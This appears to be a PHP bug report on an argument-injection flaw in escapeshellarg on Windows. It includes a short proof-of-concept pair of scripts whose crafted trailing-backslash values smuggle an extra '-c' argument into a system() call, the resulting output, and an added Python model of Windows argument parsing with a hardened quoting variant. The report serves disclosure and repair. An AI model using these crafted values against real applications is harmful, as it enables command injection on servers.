Description:
------------
The following is the report from Takayuki Uchiyama.
This issue is an OS command injection vulnerability.
Do you have a specific case that fails?
I have attached the proof-of-concept code to reproduce this issue.
----------------------------------------------------------------------
PoC Code
----------------------------------------------------------------------
[poc.php]
------------------
<?php
// Both values end in a backslash, which is the trigger for this bug.
$a = 'a\\';
$b = 'b -c d\\';
var_dump( $a, escapeshellarg($a) );
var_dump( $b, escapeshellarg($b) );
// Pass the two escaped values as two arguments and let arginfo.php show how many it receives.
system( 'php arginfo.php ' . escapeshellarg($a) . ' ' . escapeshellarg($b) );
?>
------------------
[arginfo.php]
------------------
<?php
// Dump the argument vector exactly as the command line handed it to PHP.
print( "--- ARG INFO ---\n" );
var_dump( $argv );
?>
------------------
----------------------------------------------------------------------
PoC Code
----------------------------------------------------------------------
After running 'php poc.php', if you get the following output, that version
of PHP is still vulnerable.
----------------------------------------------------------------------
Output
----------------------------------------------------------------------
string(2) "a\"
string(4) ""a\""
string(7) "b -c d\"
string(9) ""b -c d\""
--- ARG INFO ---
array(4) {
[0]=>
string(11) "arginfo.php"
[1]=>
string(4) "a" b"
[2]=>
string(2) "-c"
[3]=>
string(2) "d""
}
[Comment]
The first 4 lines are the output from the var_dump function in
poc.php. By comparing this output with the 4-5th lines of poc.php,
the output from the escapeshellarg function, it can be seen that
an attacker can set a single string that is not "" escaped as a
parameter.
Similarly, the 10 lines that follow --- ARG INFO --- are the command line
arguments when arginfo.php is called, which are output by the var_dump
function in arginfo.php. When comparing this to the way the system
function is called (with 2 parameters) in poc.php, it can be seen that the
command line interprets it as 3 parameters.
----------------------------------------------------------------------
Output
----------------------------------------------------------------------
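The argument merging shown above comes from the Windows command-line parsing rules, where a backslash right before a double quote turns that quote into a literal character. The model below is an added example (not part of the report or of PHP itself): it re-splits the escaped command line the way the Windows C runtime builds argv, and contrasts a quoting function that leaves a trailing backslash alone with one that doubles backslashes before the closing quote. The behaviour of `win_escapeshellarg` (replace `"` and `%` with a space, wrap in double quotes) is an assumption about what the affected build does; the hardened variant is this example's own, not PHP's fix.

```python
def win_escapeshellarg(s: str) -> str:
    # Assumed Windows behaviour of the affected escapeshellarg: '"' and '%'
    # become a space, then the value is wrapped in double quotes.
    # A trailing backslash is left untouched, right before the closing quote.
    return '"' + s.replace('"', ' ').replace('%', ' ') + '"'

def win_escapeshellarg_hardened(s: str) -> str:
    # Hardened variant (this example's own): every backslash that sits
    # immediately before the closing quote is doubled, so the parser sees an
    # even run of backslashes and treats the quote as a real closing quote.
    body = s.replace('"', ' ').replace('%', ' ')
    stripped = body.rstrip('\\')
    trailing = len(body) - len(stripped)
    return '"' + stripped + '\\' * (2 * trailing) + '"'

def split_windows_args(cmdline: str) -> list[str]:
    """Split a command line the way the Windows C runtime builds argv:
    2n backslashes + '"' -> n backslashes and a quote toggle;
    2n+1 backslashes + '"' -> n backslashes and a literal '"';
    backslashes not followed by '"' are literal; blanks split outside quotes."""
    args, cur, in_quotes, have_arg, i = [], [], False, False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '\\':
            n = 0
            while i < len(cmdline) and cmdline[i] == '\\':
                n += 1
                i += 1
            if i < len(cmdline) and cmdline[i] == '"':
                cur.append('\\' * (n // 2))
                if n % 2:                  # odd run: the quote is literal
                    cur.append('"')
                    i += 1                 # even run: quote handled next loop
            else:
                cur.append('\\' * n)
            have_arg = True
            continue
        if ch == '"':
            in_quotes, have_arg = not in_quotes, True
        elif ch in ' \t' and not in_quotes:
            if have_arg:
                args.append(''.join(cur))
                cur, have_arg = [], False
        else:
            cur.append(ch)
            have_arg = True
        i += 1
    if have_arg:
        args.append(''.join(cur))
    return args

def argv_for(escape, values):
    # Build the command-line tail exactly as poc.php does, then re-split it.
    return split_windows_args(' '.join(escape(v) for v in values))
```

With the report's two values, `argv_for(win_escapeshellarg, ...)` yields the three arguments seen in the PoC output, while the hardened quoting hands back the two original strings.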